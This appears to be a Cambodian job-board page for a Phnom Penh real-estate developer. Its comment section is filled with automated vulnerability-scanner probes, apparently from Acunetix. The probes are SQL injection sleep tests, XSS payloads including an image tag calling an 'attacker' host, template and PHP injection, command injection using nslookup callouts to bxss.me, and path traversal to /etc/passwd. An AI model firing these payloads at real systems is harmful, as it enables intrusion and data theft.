ថ្ងៃទី 14 - 15 ខែ វិច្ឆិកា ឆ្នាំ 2020 ក្រសួងការងារ និងបណ្តុះបណ្តាលវិជ្ជាជីវៈ

អ័រគីដេ ឌីវែឡុបមិន

អ័រគីដេ ឌីវែឡុបមិនអរគីដេ ឌីវែឡុបមិន ជាក្រុមហ៊ុនអភិវឌ្ឍន៍អចលនៈទ្រព្យដែលមានមូលដ្ឋាននៅរាជធានីភ្នំពេញព្រះរាជាណាចក្រកម្ពុជា។ ក្រុមហ៊ុនមានឯកទេសក្នុងការអភិវឌ្ឍ ការអភិវឌ្ឍចម្រុះដែលមានគុណភាពខ្ពស់ផ្អែកលើការប្រើប្រាស់លំនៅដ្ឋានជាចម្បង។

ការប្រមូលផ្តុំក្រុមប្រឹក្សាភិបាលរួមជាមួយជំនាញនិងបទពិសោធន៍ជាច្រើនប្រភេទអ័រគីដេវីឡាគ្រុបអភិវឌ្ឍគម្រោងឈានមុខគេលើទីផ្សារនិងគ្រោងការណ៍ដ៏មានកិត្យានុភាព។


ដាក់ពាក្យស្មើសុំការងារ (CV)!

ចំនួន CV ដែលបានដាក់ពាក្យរួច 37

សូមរៀបចំ CV ជាទម្រង់ Microsoft Word, PDF ឬជារូបភាព JPG។ ទំហំមិនធំជាង 5MB។


តម្រូវការជ្រើសរើសកម្លាំងពលកម្ម សរុប 13 កន្លែង

   
សំណួរ ចម្លើយ ឬ មតិយោបល់ ទៅក្រុមហ៊ុន

 • pHqghUme

  2021-05-06 08:02:34


  @@wOff9


 • pHqghUme

  2021-05-06 08:02:30


  1'"


 • pHqghUme

  2021-05-06 08:02:29


  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


 • pHqghUme

  2021-05-06 08:02:24


  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


 • pHqghUme

  2021-05-06 08:02:19


  z9magVOk')) OR 862=(SELECT 862 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:02:12


  Jdux966h') OR 413=(SELECT 413 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:02:06


  a8o6QOJl' OR 281=(SELECT 281 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:01:59


  -1)) OR 594=(SELECT 594 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:01:51


  -5) OR 862=(SELECT 862 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:01:43


  -5 OR 243=(SELECT 243 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:01:34


  I8LZJRvZ'; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:01:26


  1 waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:01:18


  -1); waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:01:09


  -1; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:01:00


  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


 • pHqghUme

  2021-05-06 08:00:51


  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


 • pHqghUme

  2021-05-06 08:00:42


  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


 • pHqghUme

  2021-05-06 08:00:32


  if(now()=sysdate(),sleep(15),0)


 • pHqghUme

  2021-05-06 08:00:19


  -1" OR 2+42-42-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 08:00:18


  -1' OR 2+42-42-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 08:00:18


  -1' OR 2+577-577-1=0+0+0+1 or 'z3JFsu2j'='


 • pHqghUme

  2021-05-06 08:00:17


  -1 OR 2+159-159-1=0+0+0+1


 • pHqghUme

  2021-05-06 08:00:16


  -1 OR 2+739-739-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 08:00:15


  jCF0e68y


 • pHqghUme

  2021-05-06 08:00:03


  1


 • pHqghUme

  2021-05-06 07:59:51


  1


 • @@5WjZ1

  2021-05-06 07:59:37


  1


 • 1'"

  2021-05-06 07:59:33


  1


 • pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  2021-05-06 07:59:32


  1


 • oGTEVevD')) OR 613=(SELECT 613 FROM PG_SLEEP(15))--

  2021-05-06 07:59:17


  1


 • smKIT8Cp') OR 669=(SELECT 669 FROM PG_SLEEP(15))--

  2021-05-06 07:59:04


  1


 • w5dfQLEq' OR 625=(SELECT 625 FROM PG_SLEEP(15))--

  2021-05-06 07:58:49


  1


 • eQiUl3bu'; waitfor delay '0:0:15' --

  2021-05-06 07:58:35


  1


 • 1 waitfor delay '0:0:15' --

  2021-05-06 07:58:23


  1


 • (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  2021-05-06 07:58:12


  1


 • 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  2021-05-06 07:58:01


  1


 • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  2021-05-06 07:57:52


  1


 • if(now()=sysdate(),sleep(15),0)

  2021-05-06 07:57:40


  1


 • -1" OR 2+896-896-1=0+0+0+1 --

  2021-05-06 07:57:30


  1


 • -1' OR 2+986-986-1=0+0+0+1 --

  2021-05-06 07:57:29


  1


 • -1' OR 2+283-283-1=0+0+0+1 or 'GbVRB8YT'='

  2021-05-06 07:57:29


  1


 • -1 OR 2+656-656-1=0+0+0+1

  2021-05-06 07:57:28


  1


 • -1 OR 2+684-684-1=0+0+0+1 --

  2021-05-06 07:57:27


  1


 • NWSTTpyE

  2021-05-06 07:57:26


  1


 • pHqghUme

  2021-05-06 07:57:12


  1


 • pHqghUme

  2021-05-06 07:56:57


  1


 • pHqghUme

  2021-05-06 07:56:46


  1


 • pHqghUme

  2021-05-06 07:56:41


  1


 • pHqghUme

  2021-05-06 07:56:41


  1


 • pHqghUme

  2021-05-06 07:56:29


  1


 • pHqghUme

  2021-05-06 07:56:17


  1


 • pHqghUme

  2021-05-06 07:56:04


  1


 • pHqghUme

  2021-05-06 07:55:50


  1


 • pHqghUme

  2021-05-06 07:55:34


  1


 • pHqghUme

  2021-05-06 07:55:11


  1


 • pHqghUme

  2021-05-06 07:54:55


  1<5qYnOI<


 • pHqghUme

  2021-05-06 07:54:47


  1<img sRc='http://attacker-9568/log.php?


 • pHqghUme

  2021-05-06 07:54:43


  1


 • pHqghUme

  2021-05-06 07:54:40


  1<eDaLZc x=9321>


 • pHqghUme

  2021-05-06 07:54:33


  1<ifRAme sRc=9259.com></IfRamE>


 • pHqghUme

  2021-05-06 07:54:27


  1<WJBMBZ>ZWNYH[!+!]</WJBMBZ>


 • pHqghUme

  2021-05-06 07:54:20


  1U81XL <ScRiPt >Mmu9(9261)</ScRiPt>


 • pHqghUme

  2021-05-06 07:54:17


  1


 • pHqghUme

  2021-05-06 07:54:14


  1<% contenteditable onresize=Mmu9(9651)>


 • pHqghUme

  2021-05-06 07:54:07


  1}body{acu:Expre/**/SSion(Mmu9(9568))}


 • pHqghUme

  2021-05-06 07:54:00


  <a HrEF=jaVaScRiPT:>


 • pHqghUme

  2021-05-06 07:53:54


  1


 • pHqghUme

  2021-05-06 07:53:54


  <a HrEF=http://xss.bxss.me></a>


 • pHqghUme

  2021-05-06 07:53:45


  1<input autofocus onfocus=Mmu9(9722)>


 • pHqghUme

  2021-05-06 07:53:36


  1&lt;ScRiPt&gt;Mmu9(9351)&lt;/sCripT&gt;


 • pHqghUme

  2021-05-06 07:53:31


  1\u003CScRiPt\Mmu9(9781)\u003C/sCripT\u003E


 • pHqghUme

  2021-05-06 07:53:27


  1


 • pHqghUme

  2021-05-06 07:53:26


  1


 • pHqghUme

  2021-05-06 07:53:25


  1


 • pHqghUme

  2021-05-06 07:53:23


  1


 • pHqghUme

  2021-05-06 07:53:23


  %31%3C%53%63%52%69%50%74%20%3E%4D%6D%75%39%289842%29%3C%2F%73%43%72%69%70%54%3E


 • pHqghUme

  2021-05-06 07:53:22


  1


 • pHqghUme

  2021-05-06 07:53:20


  1


 • pHqghUme

  2021-05-06 07:53:17


  1<img/src=">" onerror=alert(9072)>


 • pHqghUme

  2021-05-06 07:53:12


  1<img src=xyz OnErRor=Mmu9(9045)>


 • pHqghUme

  2021-05-06 07:53:05


  1<img src=//xss.bxss.me/t/dot.gif onload=Mmu9(9285)>


 • pHqghUme

  2021-05-06 07:53:00


  1<body onload=Mmu9(9443)>


 • pHqghUme

  2021-05-06 07:52:58


  1


 • pHqghUme

  2021-05-06 07:52:53


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9825'>


 • pHqghUme

  2021-05-06 07:52:46


  1<isindex type=image src=1 onerror=Mmu9(9494)>


 • pHqghUme

  2021-05-06 07:52:43


  1


 • pHqghUme

  2021-05-06 07:52:39


  1<ScRiPt >Mmu9(9011)</ScRiPt>


 • pHqghUme

  2021-05-06 07:52:32


  1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9179></ScRiPt>


 • pHqghUme

  2021-05-06 07:52:29


  1


 • pHqghUme

  2021-05-06 07:52:27


  1<ScRiPt >Mmu9(9955)</ScRiPt>


 • pHqghUme

  2021-05-06 07:52:26


  1


 • pHqghUme

  2021-05-06 07:52:25


  1


 • pHqghUme

  2021-05-06 07:52:22


  1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%4D%6D%75%39%28%39%36%35%38%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E


 • pHqghUme

  2021-05-06 07:52:16


  1<script>Mmu9(9591)</script>


 • pHqghUme

  2021-05-06 07:52:10


  1


 • pHqghUme

  2021-05-06 07:52:08


  1<WCLIHW>Z3NR1[!+!]</WCLIHW>


 • pHqghUme

  2021-05-06 07:52:02


  1<ScRiPt >Mmu9(9756)</ScRiPt>


 • pHqghUme

  2021-05-06 07:51:58


  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")


 • pHqghUme

  2021-05-06 07:51:54


  1


 • pHqghUme

  2021-05-06 07:51:54


  acx__${98991*97996}__::.x


 • pHqghUme

  2021-05-06 07:51:49


  acx[[${98991*97996}]]xca


 • pHqghUme

  2021-05-06 07:51:44


  acx{{98991*97996}}xca


 • pHqghUme

  2021-05-06 07:51:39


  1


 • pHqghUme

  2021-05-06 07:51:36


  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 07:51:32


  <th:t="${acx}#foreach


 • pHqghUme

  2021-05-06 07:51:26


  <%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 07:51:21


  1


 • pHqghUme

  2021-05-06 07:51:18


  acux10477%C0%BEz1%C0%BCz2a%90bcxuca10477


 • pHqghUme

  2021-05-06 07:51:11


  acu8345%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca8345


 • pHqghUme

  2021-05-06 07:51:06


  1


 • pHqghUme

  2021-05-06 07:51:06


  19669377


 • pHqghUme

  2021-05-06 07:51:02


  '"()&%<acx><ScRiPt >Mmu9(9552)</ScRiPt>


 • pHqghUme

  2021-05-06 07:50:56


  1'"()&%<acx><ScRiPt >Mmu9(9138)</ScRiPt>


 • pHqghUme<IbEtXW<

  2021-05-06 07:50:51


  1


 • pHqghUme

  2021-05-06 07:50:49


  1


 • pHqghUme<img sRc='http://attacker-9115/log.php?

  2021-05-06 07:50:45


  1


 • pHqghUme<NE0Mj0 x=9692>

  2021-05-06 07:50:38


  1


 • pHqghUme<ifRAme sRc=9411.com></IfRamE>

  2021-05-06 07:50:32


  1


 • pHqghUme

  2021-05-06 07:50:30


  1


 • pHqghUme<WJZIIA>7QUHR[!+!]</WJZIIA>

  2021-05-06 07:50:26


  1


 • pHqghUmeh1j9K <ScRiPt >Mmu9(9713)</ScRiPt>

  2021-05-06 07:50:20


  1


 • pHqghUme<% contenteditable onresize=Mmu9(9399)>

  2021-05-06 07:50:13


  1


 • pHqghUme

  2021-05-06 07:50:10


  1


 • pHqghUme}body{acu:Expre/**/SSion(Mmu9(9899))}

  2021-05-06 07:50:07


  1


 • <a HrEF=jaVaScRiPT:>

  2021-05-06 07:50:02


  1


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-06 07:49:57


  1


 • pHqghUme

  2021-05-06 07:49:54


  1


 • pHqghUme<input autofocus onfocus=Mmu9(9113)>

  2021-05-06 07:49:52


  1


 • pHqghUme&lt;ScRiPt&gt;Mmu9(9281)&lt;/sCripT&gt;

  2021-05-06 07:49:45


  1


 • pHqghUme\u003CScRiPt\Mmu9(9976)\u003C/sCripT\u003E

  2021-05-06 07:49:40


  1


 • pHqghUme

  2021-05-06 07:49:37


  1


 • pHqghUme

  2021-05-06 07:49:37


  1


 • pHqghUme

  2021-05-06 07:49:36


  1


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%4D%6D%75%39%289625%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-06 07:49:35


  1


 • pHqghUme

  2021-05-06 07:49:35


  1


 • pHqghUme

  2021-05-06 07:49:34


  1


 • pHqghUme

  2021-05-06 07:49:33


  1


 • pHqghUme<img/src=">" onerror=alert(9951)>

  2021-05-06 07:49:28


  1


 • pHqghUme<img src=xyz OnErRor=Mmu9(9395)>

  2021-05-06 07:49:24


  1


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=Mmu9(9225)>

  2021-05-06 07:49:18


  1


 • pHqghUme<body onload=Mmu9(9844)>

  2021-05-06 07:49:12


  1


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9235'>

  2021-05-06 07:49:08


  1


 • pHqghUme

  2021-05-06 07:49:03


  1


 • pHqghUme<isindex type=image src=1 onerror=Mmu9(9771)>

  2021-05-06 07:49:02


  1


 • pHqghUme<ScRiPt >Mmu9(9709)</ScRiPt>

  2021-05-06 07:48:53


  1


 • pHqghUme<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9418></ScRiPt>

  2021-05-06 07:48:49


  1


 • pHqghUme<ScRiPt >Mmu9(9443)</ScRiPt>

  2021-05-06 07:48:43


  1


 • pHqghUme

  2021-05-06 07:48:39


  1


 • pHqghUme%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%4D%6D%75%39%28%39%31%33%31%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

  2021-05-06 07:48:36


  1


 • pHqghUme<script>Mmu9(9182)</script>

  2021-05-06 07:48:32


  1


 • pHqghUme<WSYL1S>WUXDD[!+!]</WSYL1S>

  2021-05-06 07:48:27


  1


 • pHqghUme<ScRiPt >Mmu9(9338)</ScRiPt>

  2021-05-06 07:48:22


  1


 • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

  2021-05-06 07:48:17


  1


 • acx__${98991*97996}__::.x

  2021-05-06 07:48:11


  1


 • acx[[${98991*97996}]]xca

  2021-05-06 07:48:05


  1


 • acx{{98991*97996}}xca

  2021-05-06 07:48:01


  1


 • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

  2021-05-06 07:47:56


  1


 • <th:t="${acx}#foreach

  2021-05-06 07:47:50


  1


 • <%={{={@{#{${acx}}%>

  2021-05-06 07:47:42


  1


 • acux8683%C0%BEz1%C0%BCz2a%90bcxuca8683

  2021-05-06 07:47:34


  1


 • acu2110%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca2110

  2021-05-06 07:47:25


  1


 • pHqghUme9369230

  2021-05-06 07:47:16


  1


 • '"()&%<acx><ScRiPt >Mmu9(9879)</ScRiPt>

  2021-05-06 07:47:07


  1


 • pHqghUme'"()&%<acx><ScRiPt >Mmu9(9482)</ScRiPt>

  2021-05-06 07:46:54


  1


 • pHqghUme

  2021-05-06 07:46:40


  1


 • pHqghUme

  2021-05-06 07:46:31


  1


 • pHqghUme

  2021-05-06 07:46:25


  1


 • pHqghUme

  2021-05-06 07:46:18


  1


 • pHqghUme

  2021-05-06 07:46:13


  1


 • pHqghUme

  2021-05-06 07:46:11


  '.print(md5(31337)).'


 • pHqghUme

  2021-05-06 07:46:10


  ${@print(md5(31337))}\


 • pHqghUme

  2021-05-06 07:46:08


  ${@print(md5(31337))}


 • pHqghUme

  2021-05-06 07:46:08


  `(nslookup hitlexkbrzmpd68100.bxss.me||perl -e "gethostbyname('hitlexkbrzmpd68100.bxss.me')")`


 • pHqghUme

  2021-05-06 07:46:07


  1


 • pHqghUme

  2021-05-06 07:46:07


  ";print(md5(31337));$a="


 • pHqghUme

  2021-05-06 07:46:07


  |(nslookup hitrvrgipiocn6d466.bxss.me||perl -e "gethostbyname('hitrvrgipiocn6d466.bxss.me')")


 • pHqghUme

  2021-05-06 07:46:06


  ';print(md5(31337));$a='


 • pHqghUme

  2021-05-06 07:46:05


  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


 • '.print(md5(31337)).'

  2021-05-06 07:46:04


  1


 • ${@print(md5(31337))}\

  2021-05-06 07:46:03


  1


 • pHqghUme

  2021-05-06 07:46:03


  $(nslookup hitspxeiqifqj2f9b9.bxss.me||perl -e "gethostbyname('hitspxeiqifqj2f9b9.bxss.me')")


 • ${@print(md5(31337))}

  2021-05-06 07:46:02


  1


 • pHqghUme

  2021-05-06 07:46:02


  (nslookup hitspednhcnai9fe50.bxss.me||perl -e "gethostbyname('hitspednhcnai9fe50.bxss.me')")


 • pHqghUme

  2021-05-06 07:45:55


  |echo rryoji$()\ cbmdmr\nz^xyu||a #' |echo rryoji$()\ cbmdmr\nz^xyu||a #|" |echo rryoji$()\ cbmdmr\nz^xyu||a #


 • ";print(md5(31337));$a="

  2021-05-06 07:45:55


  1


 • pHqghUme

  2021-05-06 07:45:49


  &echo ovaizj$()\ hpoyhx\nz^xyu||a #' &echo ovaizj$()\ hpoyhx\nz^xyu||a #|" &echo ovaizj$()\ hpoyhx\nz^xyu||a #


 • ';print(md5(31337));$a='

  2021-05-06 07:45:49


  1


 • ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  2021-05-06 07:45:48


  1


 • pHqghUme

  2021-05-06 07:45:48


  <!--


 • pHqghUme

  2021-05-06 07:45:47


  1


 • pHqghUme

  2021-05-06 07:45:47


  '"


 • pHqghUme

  2021-05-06 07:45:47


  echo iijmad$()\ aokfod\nz^xyu||a #' &echo iijmad$()\ aokfod\nz^xyu||a #|" &echo iijmad$()\ aokfod\nz^xyu||a #


 • pHqghUme

  2021-05-06 07:45:46


  1


 • <!--

  2021-05-06 07:45:46


  1


 • pHqghUme

  2021-05-06 07:45:45


  1


 • pHqghUme

  2021-05-06 07:45:45


  1


 • '"

  2021-05-06 07:45:45


  1


 • pHqghUme

  2021-05-06 07:45:44


  1


 • pHqghUme

  2021-05-06 07:45:43


  1


 • `(nslookup hitbzmviionfgb783c.bxss.me||perl -e "gethostbyname('hitbzmviionfgb783c.bxss.me')")`

  2021-05-06 07:45:43


  1


 • pHqghUme

  2021-05-06 07:45:43


  1


 • |(nslookup hittvdtnivinx6e445.bxss.me||perl -e "gethostbyname('hittvdtnivinx6e445.bxss.me')")

  2021-05-06 07:45:42


  1


 • pHqghUme

  2021-05-06 07:45:42


  1


 • pHqghUme

  2021-05-06 07:45:42


  /xfs.bxss.me


 • pHqghUme

  2021-05-06 07:45:42


  1


 • pHqghUme

  2021-05-06 07:45:41


  '+'A'.concat(70-3).concat(22*4).concat(107).concat(86).concat(120).concat(77)+(require'socket' Socket.gethostbyname('hittl'+'stiangrdb9cdb.bxss.me.')[3].to_s)+'


 • pHqghUme

  2021-05-06 07:45:41


  1


 • pHqghUme

  2021-05-06 07:45:41


  bxss.me/t/xss.html?%00


 • /xfs.bxss.me

  2021-05-06 07:45:41


  1


 • pHqghUme

  2021-05-06 07:45:41


  1


 • pHqghUme

  2021-05-06 07:45:40


  1


 • pHqghUme

  2021-05-06 07:45:40


  HttP://bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 07:45:40


  1


 • pHqghUme

  2021-05-06 07:45:40


  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


 • '+'A'.concat(70-3).concat(22*4).concat(115).concat(79).concat(120).concat(85)+(require'socket' Socket.gethostbyname('hitzc'+'gaaxcewp1edf8.bxss.me.')[3].to_s)+'

  2021-05-06 07:45:39


  1


 • pHqghUme

  2021-05-06 07:45:39


  1


 • pHqghUme

  2021-05-06 07:45:39


  1


 • bxss.me/t/xss.html?%00

  2021-05-06 07:45:39


  1


 • )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  2021-05-06 07:45:39


  1


 • pHqghUme

  2021-05-06 07:45:39


  "+"A".concat(70-3).concat(22*4).concat(100).concat(86).concat(107).concat(77)+(require"socket" Socket.gethostbyname("hitzh"+"zdxnlezk6a657.bxss.me.")[3].to_s)+"


 • HttP://bxss.me/t/xss.html?%00

  2021-05-06 07:45:38


  1


 • pHqghUme

  2021-05-06 07:45:38


  1


 • pHqghUme

  2021-05-06 07:45:37


  12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡


 • $(nslookup hittmwpzechcedb114.bxss.me||perl -e "gethostbyname('hittmwpzechcedb114.bxss.me')")

  2021-05-06 07:45:37


  1


 • pHqghUme

  2021-05-06 07:45:37


  1


 • "+"A".concat(70-3).concat(22*4).concat(107).concat(79).concat(116).concat(74)+(require"socket" Socket.gethostbyname("hityq"+"eagqxwuybb563.bxss.me.")[3].to_s)+"

  2021-05-06 07:45:37


  1


 • pHqghUme

  2021-05-06 07:45:37


  1


 • pHqghUme

  2021-05-06 07:45:36


  bxss.me


 • pHqghUme

  2021-05-06 07:45:36


  1


 • pHqghUme

  2021-05-06 07:45:36


  1


 • pHqghUme

  2021-05-06 07:45:36


  1


 • pHqghUme

  2021-05-06 07:45:35


  1


 • pHqghUme

  2021-05-06 07:45:35


  http://bxss.me/t/fit.txt%3F.jpg


 • pHqghUme

  2021-05-06 07:45:35


  1


 • pHqghUme

  2021-05-06 07:45:35


  1


 • (nslookup hitmwralyjdudd7e56.bxss.me||perl -e "gethostbyname('hitmwralyjdudd7e56.bxss.me')")

  2021-05-06 07:45:35


  1


 • pHqghUme

  2021-05-06 07:45:34


  '"()


 • pHqghUme

  2021-05-06 07:45:34


  Http://bxss.me/t/fit.txt


 • pHqghUme

  2021-05-06 07:45:34


  1


 • |echo omiexe$()\ fnzlau\nz^xyu||a #' |echo omiexe$()\ fnzlau\nz^xyu||a #|" |echo omiexe$()\ fnzlau\nz^xyu||a #

  2021-05-06 07:45:34


  1


 • pHqghUme

  2021-05-06 07:45:34


  1


 • pHqghUme

  2021-05-06 07:45:33


  1


 • pHqghUme

  2021-05-06 07:45:33


  1some_inexistent_file_with_long_name%00.jpg


 • &echo zppbvk$()\ buwqsr\nz^xyu||a #' &echo zppbvk$()\ buwqsr\nz^xyu||a #|" &echo zppbvk$()\ buwqsr\nz^xyu||a #

  2021-05-06 07:45:33


  1


 • pHqghUme

  2021-05-06 07:45:33


  1


 • pHqghUme

  2021-05-06 07:45:32


  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg


 • echo wvdytj$()\ mlodjq\nz^xyu||a #' &echo wvdytj$()\ mlodjq\nz^xyu||a #|" &echo wvdytj$()\ mlodjq\nz^xyu||a #

  2021-05-06 07:45:32


  1


 • http://bxss.me/t/fit.txt%3F.jpg

  2021-05-06 07:45:30


  1


 • '"()

  2021-05-06 07:45:30


  1


 • pHqghUme

  2021-05-06 07:45:30


  1&n923107=v960186


 • bxss.me

  2021-05-06 07:45:30


  1


 • pHqghUme

  2021-05-06 07:45:29


  ".gethostbyname(lc("hittz"."puncstpr6c9ed.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(84).chr(107).chr(66)."


 • Http://bxss.me/t/fit.txt

  2021-05-06 07:45:29


  1


 • pHqghUme

  2021-05-06 07:45:28


  1


 • 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

  2021-05-06 07:45:28


  1


 • pHqghUme

  2021-05-06 07:45:28


  ^(#$!@#$)(()))******


 • 1some_inexistent_file_with_long_name%00.jpg

  2021-05-06 07:45:28


  1


 • pHqghUme

  2021-05-06 07:45:28


  '.gethostbyname(lc('hitbz'.'vhnhnkmm8c279.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(85).chr(108).chr(84).'


 • pHqghUme

  2021-05-06 07:45:27


  1


 • pHqghUme

  2021-05-06 07:45:27


  !(()&&!|*|*|


 • http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

  2021-05-06 07:45:27


  1


 • ".gethostbyname(lc("hitym"."sttufojddd873.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(90).chr(116).chr(81)."

  2021-05-06 07:45:27


  1


 • pHqghUme

  2021-05-06 07:45:26


  1


 • pHqghUme

  2021-05-06 07:45:26


  )


 • '.gethostbyname(lc('hitdz'.'qejnczfk6425f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(69).chr(111).chr(71).'

  2021-05-06 07:45:26


  1


 • pHqghUme

  2021-05-06 07:45:25


  1


 • pHqghUme

  2021-05-06 07:45:25


  1


 • pHqghUme

  2021-05-06 07:45:25


  1


 • pHqghUme

  2021-05-06 07:45:24


  1


 • pHqghUme&n904242=v966234

  2021-05-06 07:45:24


  1


 • pHqghUme

  2021-05-06 07:45:24


  1


 • ^(#$!@#$)(()))******

  2021-05-06 07:45:24


  1


 • pHqghUme

  2021-05-06 07:45:23


  1


 • )

  2021-05-06 07:45:23


  1


 • pHqghUme

  2021-05-06 07:45:23


  ../1


 • pHqghUme

  2021-05-06 07:45:23


  1


 • pHqghUme

  2021-05-06 07:45:23


  1


 • pHqghUme

  2021-05-06 07:45:23


  1


 • !(()&&!|*|*|

  2021-05-06 07:45:23


  1


 • pHqghUme

  2021-05-06 07:45:22


  1


 • pHqghUme

  2021-05-06 07:45:22


  1


 • pHqghUme

  2021-05-06 07:45:22


  1


 • pHqghUme

  2021-05-06 07:45:22


  1


 • pHqghUme

  2021-05-06 07:45:21


  1


 • pHqghUme

  2021-05-06 07:45:21


  ../../../../../../../../../../../../../../windows/win.ini


 • pHqghUme

  2021-05-06 07:45:21


  1


 • pHqghUme

  2021-05-06 07:45:21


  1


 • pHqghUme

  2021-05-06 07:45:20


  1


 • pHqghUme

  2021-05-06 07:45:20


  ../../../../../../../../../../../../../../etc/passwd


 • pHqghUme

  2021-05-06 07:45:20


  1


 • pHqghUme

  2021-05-06 07:45:20


  1


 • pHqghUme

  2021-05-06 07:45:20


  1


 • pHqghUme

  2021-05-06 07:45:19


  1


 • ../pHqghUme

  2021-05-06 07:45:19


  1


 • pHqghUme

  2021-05-06 07:45:19


  1


 • pHqghUme

  2021-05-06 07:45:19


  1


 • pHqghUme

  2021-05-06 07:45:18


  1


 • ../../../../../../../../../../../../../../windows/win.ini

  2021-05-06 07:45:17


  1


 • pHqghUme

  2021-05-06 07:45:17


  1


 • pHqghUme

  2021-05-06 07:45:17


  1


 • pHqghUme

  2021-05-06 07:45:17


  1


 • pHqghUme

  2021-05-06 07:45:17


  1


 • pHqghUme

  2021-05-06 07:45:16


  1


 • ../../../../../../../../../../../../../../etc/passwd

  2021-05-06 07:45:16


  1


 • pHqghUme

  2021-05-06 07:45:16


  1


 • pHqghUme

  2021-05-06 07:45:16


  1


 • pHqghUme

  2021-05-06 07:45:15


  1


 • pHqghUme

  2021-05-06 07:45:14


  1


 • pHqghUme

  2021-05-06 07:45:14


  1


 • pHqghUme

  2021-05-06 07:45:13


  1


 • pHqghUme

  2021-05-06 07:45:13


  1


 • pHqghUme

  2021-05-06 07:45:13


  1


 • pHqghUme

  2021-05-06 07:45:11


  1


 • T3U0WTFGVGM=

  2021-05-06 07:45:11


  1


 • pHqghUme

  2021-05-06 07:45:11


  1


 • pHqghUme

  2021-05-06 07:45:09


  1


 • pHqghUme

  2021-05-06 07:45:09


  1


 • pHqghUme

  2021-05-06 07:45:09


  1


 • pHqghUme

  2021-05-06 07:45:08


  1<esi:include src="http://bxss.me/rpb.png"/>


 • pHqghUme

  2021-05-06 07:45:08


  ${9999624+9999995}


 • pHqghUme

  2021-05-06 07:45:08


  1


 • pHqghUme<esi:include src="http://bxss.me/rpb.png"/>

  2021-05-06 07:45:07


  1


 • pHqghUme

  2021-05-06 07:45:07


  1


 • ${10000057+9999993}

  2021-05-06 07:45:07


  1


 • pHqghUme

  2021-05-06 07:45:07


  1


 • pHqghUme

  2021-05-06 07:45:07


  1


 • pHqghUme

  2021-05-06 07:45:06


  1


 • pHqghUme

  2021-05-06 07:45:06


  1


 • pHqghUme

  2021-05-06 07:45:06


  1


 • pHqghUme

  2021-05-06 07:45:05


  1


 • pHqghUme

  2021-05-06 07:45:05


  1


 • pHqghUme

  2021-05-06 07:45:04


  1


 • pHqghUme

  2021-05-06 07:45:04


  1


 • pHqghUme

  2021-05-06 07:45:01


  1


 • pHqghUme

  2021-05-06 07:45:00


  '+response.write(9634916*9715651)+'


 • pHqghUme

  2021-05-06 07:45:00


  "+response.write(9634916*9715651)+"


 • "+response.write(9948549*9619366)+"

  2021-05-06 07:44:58


  1


 • pHqghUme

  2021-05-06 07:44:58


  EggVvG4A


 • pHqghUme

  2021-05-06 07:44:58


  response.write(9634916*9715651)


 • Zy7Ag24e

  2021-05-06 07:44:57


  1


